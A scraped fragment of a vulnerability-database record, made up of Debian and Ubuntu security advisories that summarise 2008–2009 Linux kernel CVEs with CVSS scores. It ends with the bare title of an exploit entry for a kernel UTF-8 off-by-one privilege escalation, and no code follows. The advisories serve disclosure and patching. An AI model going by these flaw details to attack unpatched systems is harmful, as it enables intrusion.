exec system call to launch a setuid application.\n* [CVE-2009-1338](https://security-tracker.debian.org/tracker/CVE-2009-1338)\nDaniel Hokka Zakrisson discovered that a kill(-1) is permitted to\n reach processes outside of the current process namespace.\n* [CVE-2009-1439](https://security-tracker.debian.org/tracker/CVE-2009-1439)\nPavan Naregundi reported an issue in the CIFS filesystem code that\n allows remote users to overwrite memory via a long\n nativeFileSystem field in a Tree Connect response during mount.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 2.6.24-6~etchnhalf.8etch1.\n\n\nWe recommend that you upgrade your linux-2.6.24 packages.\n\n\nNote: Debian 'etch' includes linux kernel packages based upon both the\n2.6.18 and 2.6.24 linux releases. All known security issues are\ncarefully tracked against both packages and both packages will receive\nsecurity updates until security support for Debian 'etch'\nconcludes. However, given the high frequency at which low-severity\nsecurity issues are discovered in the kernel and the resource\nrequirements of doing an update, lower severity 2.6.18 and 2.6.24\nupdates will typically release in a staggered or \"leap-frog\" fashion.\n\n\n", "cvss3": {}, "published": "2009-05-02T00:00:00", "type": "osv", "title": "linux-2.6.24 - several vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5702", "CVE-2009-1046", "CVE-2008-5395", "CVE-2008-5700", "CVE-2009-0859", "CVE-2009-0675", "CVE-2008-4307", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-0322", "CVE-2009-0676", "CVE-2009-1192", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-0745", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0269", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-0031", "CVE-2009-1439", "CVE-2009-0029", "CVE-2008-5701"], "modified": "2022-07-21T05:46:51", "id": "OSV:DSA-1787-1", "href": "https://osv.dev/vulnerability/DSA-1787-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-01-26T13:42:14", "description": "## Releases\n\n * Ubuntu 8.10 \n * Ubuntu 8.04 \n * Ubuntu 7.10 \n\n## Packages\n\n * linux \\- \n * linux-source-2.6.22 \\- \n\nNFS did not correctly handle races between fcntl and interrupts. A local \nattacker on an NFS mount could consume unlimited kernel memory, leading to \na denial of service. Ubuntu 8.10 was not affected. (CVE-2008-4307)\n\nSparc syscalls did not correctly check mmap regions. A local attacker \ncould cause a system panic, leading to a denial of service. Ubuntu 8.10 \nwas not affected. (CVE-2008-6107)\n\nIn certain situations, cloned processes were able to send signals to parent \nprocesses, crossing privilege boundaries. A local attacker could send \narbitrary signals to parent processes, leading to a denial of service. \n(CVE-2009-0028)\n\nThe kernel keyring did not free memory correctly. A local attacker could \nconsume unlimited kernel memory, leading to a denial of service. \n(CVE-2009-0031)\n\nThe SCTP stack did not correctly validate FORWARD-TSN packets. A remote \nattacker could send specially crafted SCTP traffic causing a system crash, \nleading to a denial of service. (CVE-2009-0065)\n\nThe eCryptfs filesystem did not correctly handle certain VFS return codes. \nA local attacker with write-access to an eCryptfs filesystem could cause a \nsystem crash, leading to a denial of service. (CVE-2009-0269)\n\nThe Dell platform device did not correctly validate user parameters. A \nlocal attacker could perform specially crafted reads to crash the system, \nleading to a denial of service. (CVE-2009-0322)\n\nThe page fault handler could consume stack memory. A local attacker could \nexploit this to crash the system or gain root privileges with a Kprobe \nregistered. Only Ubuntu 8.10 was affected. (CVE-2009-0605)\n\nNetwork interfaces statistics for the SysKonnect FDDI driver did not check \ncapabilities. A local user could reset statistics, potentially interfering \nwith packet accounting systems. (CVE-2009-0675)\n\nThe getsockopt function did not correctly clear certain parameters. A local \nattacker could read leaked kernel memory, leading to a loss of privacy. \n(CVE-2009-0676)\n\nThe ext4 filesystem did not correctly clear group descriptors when \nresizing. A local attacker could exploit this to crash the system, leading \nto a denial of service. (CVE-2009-0745)\n\nThe ext4 filesystem did not correctly validate certain fields. A local \nattacker could mount a malicious ext4 filesystem, causing a system \ncrash, leading to a denial of service. (CVE-2009-0746, CVE-2009-0747, \nCVE-2009-0748)\n\nThe syscall interface did not correctly validate parameters when crossing \nthe 64-bit/32-bit boundary. A local attacker could bypass certain syscall \nrestricts via crafted syscalls. (CVE-2009-0834, CVE-2009-0835)\n\nThe shared memory subsystem did not correctly handle certain shmctl calls \nwhen CONFIG_SHMEM was disabled. Ubuntu kernels were not vulnerable, since \nCONFIG_SHMEM is enabled by default. (CVE-2009-0859)\n\nThe virtual consoles did not correctly handle certain UTF-8 sequences. A \nlocal attacker on the physical console could exploit this to cause a system \ncrash, leading to a denial of service. (CVE-2009-1046)\n", "cvss3": {}, "published": "2009-04-06T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4307", "CVE-2008-6107", "CVE-2009-0028", "CVE-2009-0031", "CVE-2009-0065", "CVE-2009-0269", "CVE-2009-0322", "CVE-2009-0605", "CVE-2009-0675", "CVE-2009-0676", "CVE-2009-0745", "CVE-2009-0746", "CVE-2009-0747", "CVE-2009-0748", "CVE-2009-0834", "CVE-2009-0835", "CVE-2009-0859", "CVE-2009-1046"], "modified": "2009-04-06T00:00:00", "id": "USN-751-1", "href": "https://ubuntu.com/security/notices/USN-751-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Linux Kernel 2.6.24_16-232.6.27_7-102.6.28.3 (Ubuntu 8.048.10 Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Privilege Escalation

Description

Related